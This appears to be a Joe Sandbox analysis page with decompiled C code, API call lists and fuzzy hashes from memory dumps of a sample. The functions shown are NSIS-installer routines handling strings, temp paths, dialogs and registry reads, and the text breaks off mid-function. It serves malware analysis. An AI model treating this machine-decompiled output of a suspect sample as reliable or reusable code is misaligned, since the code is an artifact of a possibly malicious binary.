Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp", "C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nstC2CA.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nstC2CA.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp$C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll
API String ID: 1659193697-2735175650
Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x42aa20 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

APIs

DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(000F0074,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,75B53420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
